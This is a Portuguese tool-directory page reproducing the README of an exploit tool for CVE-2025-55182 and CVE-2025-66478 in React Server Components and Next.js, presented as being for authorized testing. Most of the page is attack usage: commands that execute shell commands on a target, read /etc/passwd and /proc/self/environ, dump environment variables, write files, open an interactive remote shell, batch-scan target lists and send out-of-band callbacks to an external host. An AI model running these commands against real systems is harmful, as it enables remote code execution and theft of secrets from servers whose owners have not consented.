Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-55182-Exploit-PoC-Scanner — Ferramenta de exploração para CVE-2025-55182 e CVE-2025-66478 em React Server Components e Next.js, com gadgets de RCE, leitura/escrita de arquivos, callbacks OOB e shell interativo para testes de segurança autorizados. | Kitploit
Ferramentas/GitHubGitHub/zemarkhos/cve-2025-55182-exploit-poc-scanner
Scanners de VulnerabilidadesAnálise Dinâmica (Sandboxing)ExploraçãoExploração de Aplicações WebSegurança WebTestes de PenetraçãoComando e ControleAprendizado e Educação
Red Teaming
Desenvolvimento de Payloads
GitHubzemarkhos/cve-2025-55182-exploit-poc-scanner

CVE-2025-55182-Exploit-PoC-Scanner

Ferramenta de exploração para CVE-2025-55182 e CVE-2025-66478 em React Server Components e Next.js, com gadgets de RCE, leitura/escrita de arquivos, callbacks OOB e shell interativo para testes de segurança autorizados.

Ver Repositório
2112há 9 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-55182 – Exploit de RCE em React Server Components v2.0

Uma ferramenta abrangente de pesquisa em segurança para testar as vulnerabilidades CVE-2025-55182 e CVE-2025-66478 em React Server Components (RSC) e Server Actions do Next.js.

Visão Geral da Vulnerabilidade

PropriedadeValor
IDs de CVECVE-2025-55182, CVE-2025-66478
Pontuação CVSS10.0 (CRÍTICA)
Versões AfetadasReact < 19.2.0, Next.js < 15.0.5
Tipo de VulnerabilidadeExecução Remota de Código (RCE)
Vetor de AtaqueRede

Recursos

  • Varredura de vulnerabilidades estilo PortSwigger com múltiplos payloads de detecção
  • Múltiplos gadgets de RCE (execSync, spawnSync, vm.runInThisContext, etc.)
  • Teste de callback Out-of-Band (OOB) para verificação de RCE cega
  • Capacidades de leitura/escrita de arquivos
  • Execução de código JavaScript
  • Modo de shell interativo
  • Varredura em lote com múltiplas threads
  • Suporte a proxy (compatível com Burp Suite)
  • Formatos de saída JSON/Texto

Instalação

Requisitos

pip install requests

Versão do Python

  • Python 3.7 ou superior

Início Rápido

# Basic vulnerability check
python3 exploit-custom.py -u https://target.com --check

# Full vulnerability scan (recommended)
python3 exploit-custom.py -u https://target.com --scan

# With proxy (Burp Suite)
python3 exploit-custom.py -u https://target.com --scan -p http://127.0.0.1:8080

# OOB callback test
python3 exploit-custom.py -u https://target.com --oob your-id.oastify.com

# Command execution
python3 exploit-custom.py -u https://target.com --cmd "whoami"

# Interactive shell
python3 exploit-custom.py -u https://target.com --shell

Uso

Argumentos de Linha de Comando

usage: exploit-custom.py [-h] (-u URL | -l URL_LIST) [-p PROXY] [-c COOKIES]
                         [-H HEADER] [-t THREADS] [--timeout TIMEOUT]
                         [--check] [--detect] [--scan] [--test-all]
                         [--oob HOST] [--cmd CMD] [--gadget GADGET]
                         [--read FILE] [--write FILE CONTENT] [--js JS]
                         [--shell] [-o OUTPUT] [-q]

Seleção de Alvo

ArgumentoDescriçãoExemplo
-u, --urlURL de um único alvo-u https://target.com
-l, --listArquivo contendo URLs-l targets.txt

Modos de Varredura

ArgumentoDescrição
--detectDetecta o uso de Next.js/RSC
--checkVerificação rápida de vulnerabilidade (teste matemático)
--scanVarredura completa de vulnerabilidades (estilo PortSwigger)
--test-allTesta todos os gadgets e payloads de detecção

Exploração

ArgumentoDescriçãoExemplo
--cmdExecuta comando de shell--cmd "id"
--gadgetEspecifica o gadget a usar--gadget execSync
--readLê arquivo do alvo--read /etc/passwd
--writeEscreve arquivo no alvo--write /tmp/test.txt "content"
--jsExecuta código JavaScript--js "process.env"
--shellInicia shell interativo--shell
--oobHost de callback OOB--oob xyz.oastify.com

Opções de Conexão

ArgumentoDescriçãoExemplo
-p, --proxyProxy HTTP/HTTPS-p http://127.0.0.1:8080
-c, --cookiesString de cookie-c "session=abc123"
-H, --headerCabeçalho extra (repetível)-H "X-Custom: value"
-t, --threadsNúmero de threads para varredura em lote-t 20
--timeoutTempo limite de requisição em segundos--timeout 60

Opções de Saída

ArgumentoDescrição
-o, --outputSalva resultados em arquivo (.json ou .txt)
-q, --quietSuprime o banner

Exemplos de Varredura

Alvo Único

# Detect Next.js and RSC
python3 exploit-custom.py -u https://target.com --detect

# Quick vulnerability check
python3 exploit-custom.py -u https://target.com --check

# Full scan with all detection payloads
python3 exploit-custom.py -u https://target.com --scan

# Test all gadgets with OOB verification
python3 exploit-custom.py -u https://target.com --test-all --oob xyz.oastify.com

Varredura em Lote

# Scan multiple targets
python3 exploit-custom.py -l targets.txt --scan -o results.json

# With increased threads
python3 exploit-custom.py -l targets.txt --scan -t 20 -o results.json

# With OOB callbacks
python3 exploit-custom.py -l targets.txt --oob xyz.oastify.com -o results.json

Exemplos de Exploração

Execução de Comandos

# Using default gadget (execSync)
python3 exploit-custom.py -u https://target.com --cmd "whoami"

# Using specific gadget
python3 exploit-custom.py -u https://target.com --cmd "id" --gadget spawnSync
python3 exploit-custom.py -u https://target.com --cmd "cat /etc/passwd" --gadget execFileSync

Operações de Arquivo

# Read file
python3 exploit-custom.py -u https://target.com --read /etc/passwd
python3 exploit-custom.py -u https://target.com --read /proc/self/environ

# Write file
python3 exploit-custom.py -u https://target.com --write /tmp/pwned.txt "pwned"

Execução de JavaScript

# Get environment variables
python3 exploit-custom.py -u https://target.com --js "JSON.stringify(process.env)"

# Get hostname
python3 exploit-custom.py -u https://target.com --js "require('os').hostname()"

# List directory
python3 exploit-custom.py -u https://target.com --js "require('fs').readdirSync('/')"

Shell Interativo

python3 exploit-custom.py -u https://target.com --shell

Comandos do shell:

ComandoDescrição
<command>Executa comando de shell
!read <file>Lê arquivo
!write <file> <content>Escreve arquivo
!js <code>Executa JavaScript
!gadget <name>Alterna gadget
exitSai do shell

Gadgets Disponíveis

Gadgets de RCE

NomeModule IDDescrição
execSyncchild_process#execSyncExecução direta de comandos de shell
execFileSyncchild_process#execFileSyncExecuta arquivo binário
spawnSyncchild_process#spawnSyncCria processo com argumentos
vm_runInThisContextvm#runInThisContextExecuta JS no contexto atual
vm_runInNewContextvm#runInNewContextExecuta JS com escape da sandbox
vm_runInThisContext_globalvm#runInThisContextExecuta via global.process

Gadgets de Arquivo

NomeModule IDDescrição
fs_readFileSyncfs#readFileSyncLê arquivos arbitrários
fs_writeFileSyncfs#writeFileSyncEscreve arquivos arbitrários

Gadgets OOB

NomeDescrição
vm_fetchRequisição HTTP via API fetch (Node 18+)
vm_httpRequisição HTTP via módulo http

Payloads de Detecção (CVE-2025-66478)

O modo --scan usa estes payloads de detecção estilo PortSwigger:

PayloadDescrição
property_referenceReferência de propriedade delimitada por dois-pontos ["$1:a:a"]
property_reference_v2Referência alternativa ["$1:b:b"]
property_reference_constructorAcesso ao construtor via referência de propriedade
property_reference_protoAcesso à cadeia proto via referência de propriedade
action_ref_vmACTION_REF com vm#runInThisContext
action_ref_execSyncACTION_REF com child_process#execSync

Métodos de Callback OOB

A ferramenta suporta vários métodos de callback OOB:

MétodoDescrição
curlRequisição HTTP via comando curl
wgetRequisição HTTP via comando wget
nslookupConsulta DNS
pingPing ICMP
fetchAPI fetch do Node.js
httpMódulo http do Node.js
Baixar ferramenta